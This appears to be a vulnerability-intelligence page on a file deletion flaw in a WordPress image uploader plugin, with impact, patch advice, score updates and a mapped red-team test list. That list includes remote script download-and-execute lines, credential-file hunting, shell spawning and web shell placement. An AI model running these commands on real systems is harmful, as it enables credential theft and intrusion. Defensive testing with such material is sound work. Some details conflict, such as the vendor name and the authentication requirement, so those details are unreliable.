CVE-2024-13720
Overview
This vulnerability is an arbitrary file deletion flaw caused by insufficient validation of file paths within the gky_image_uploader_main_function() in the filipmedia WP Image Uploader WordPress plugin. The affected component fails to properly sanitize user-supplied input used to reference files on the server, allowing manipulation of file system paths. This weakness exists in all versions up to and including 1.0.1 of the plugin, impacting its core file handling mechanism.
Vulnerability Description
The WP Image Uploader plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the gky_image_uploader_main_function() function in all versions up to, and including, 1.0.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
Impact
An unauthenticated attacker can delete arbitrary files on the web server, including critical configuration files, by exploiting this vulnerability. This can lead to denial of service or facilitate remote code execution if files essential to WordPress operation are removed. The attack requires only network access to the vulnerable WordPress instance, with no user interaction or authentication needed (CVSS vector AV:N/AC:L/PR:L/UI:N). The resulting compromise can cause data loss, service disruption, and potential full server takeover.
Solution
Users should upgrade the filipmedia WP Image Uploader plugin to a version later than 1.0.1 where this vulnerability is addressed. Detailed patch and remediation instructions are available from the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/4af41f69-1335-4199-bf29-c9699de50a16. Applying the updated plugin version replaces the vulnerable file handling logic with proper path validation, mitigating the arbitrary file deletion risk.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the WP Image Uploader plugin for WordPress arises from inadequate validation of file paths within the gky_image_uploader_main_function(). This flaw allows unauthorized users to delete arbitrary files on the server, as the plugin does not sufficiently check whether the requested file deletion is legitimate. This lack of validation can be exploited by attackers to target critical files, such as configuration files or other sensitive data, leading to severe consequences, including the potential for remote code execution. The vulnerability exists in all versions up to and including 1.0.1, making it imperative for users of this plugin to assess their risk exposure.
Attack vectors for this vulnerability are particularly concerning due to the ease with which unauthenticated attackers can exploit it. By crafting specific requests to the vulnerable function, an attacker can manipulate the file path to point to sensitive files on the server. For instance, if an attacker successfully deletes the wp-config.php file, they can disrupt the website's functionality and potentially gain access to database credentials and other sensitive information. This exploitation can be executed without any prior authentication, making it accessible to a wide range of attackers, including those with minimal technical skills. The simplicity of this attack vector amplifies the risk associated with the vulnerability.
The real-world impact of this vulnerability can be profound, particularly for businesses relying on WordPress for their online presence. The ability to delete critical files can lead to website downtime, loss of data integrity, and exposure of sensitive information. For organizations that handle customer data or financial transactions, the repercussions can extend beyond immediate operational disruptions to long-term reputational damage and legal liabilities. The potential for remote code execution further escalates the risk, as it could allow attackers to deploy malware, steal data, or even pivot to other systems within the network. The business risk is compounded by the fact that many organizations may not have adequate monitoring or incident response plans in place to address such vulnerabilities swiftly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. Regularly updating plugins and monitoring for vulnerabilities is crucial; users of the WP Image Uploader plugin should immediately upgrade to the latest version or consider alternative solutions if updates are not available. Additionally, employing web application firewalls (WAFs) can help filter out malicious requests targeting the vulnerable function. Implementing strict file permissions and regularly auditing server configurations can further reduce the attack surface. Organizations should also conduct routine security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the vulnerability in the WP Image Uploader plugin poses a significant threat to WordPress users, particularly due to its potential for arbitrary file deletion and subsequent remote code execution. The ease of exploitation and the severe implications for business operations necessitate immediate attention from affected organizations. By adopting robust detection and mitigation strategies, businesses can better protect themselves against the risks associated with this vulnerability and enhance their overall cybersecurity posture.
Recent adjustments to the CVSS and EPSS scores for CVE-2024-13720 reflect a recalibration of the vulnerability’s exploitability and impact based on evolving threat intelligence. The CVSS score was revised downward from 9.1 to 8.8, indicating a slightly reduced but still high severity level. Concurrently, the EPSS score decreased by over a quarter, signaling a notable reduction in the probability of exploitation in the near term. CSURFACE threat intelligence and our telemetry reveal a declining trend in exploit attempts, with no new proof-of-concept exploits or active campaigns detected. This suggests that while the vulnerability remains critical due to its potential for arbitrary file deletion and remote code execution, immediate exploitation pressure has lessened. For defenders, this update underscores a marginally reduced urgency but does not diminish the need for vigilance, as the vulnerability’s inherent risk persists and could be leveraged by opportunistic threat actors if conditions change. The downward adjustment in risk metrics should inform prioritization strategies but not lead to complacency in patch management or monitoring efforts.
Update 2 — June 13, 2026
The CVSS score for CVE-2024-13720 has been revised upward from 8.8 to 9.1, reflecting a reassessment of the vulnerability’s impact and exploitability. This adjustment signals an increased recognition of the potential severity of arbitrary file deletion in the WP Image Uploader plugin, particularly given the ease with which unauthenticated attackers can trigger this flaw. While our telemetry continues to show no emergence of new exploit techniques or active exploitation campaigns, the elevated score underscores the critical nature of the vulnerability and its capacity to facilitate remote code execution through targeted file deletions such as wp-config.php. For defenders, this change emphasizes the necessity of maintaining high prioritization in patch management and monitoring, as the vulnerability’s exploit potential remains substantial despite stable exploitation trends. The updated risk rating should inform ongoing threat modeling and resource allocation, ensuring that defensive postures remain aligned with the refined severity assessment.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ivanm | Wp Image Uploader | All |
cpe:2.3:a:ivanm:wp_image_uploader:*:*:*:*:*:wordpress:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-13720 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/4af41f69-1335-4199-bf29-c9699de50a16?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/wp-image-uploader/trunk/index.php#L85 |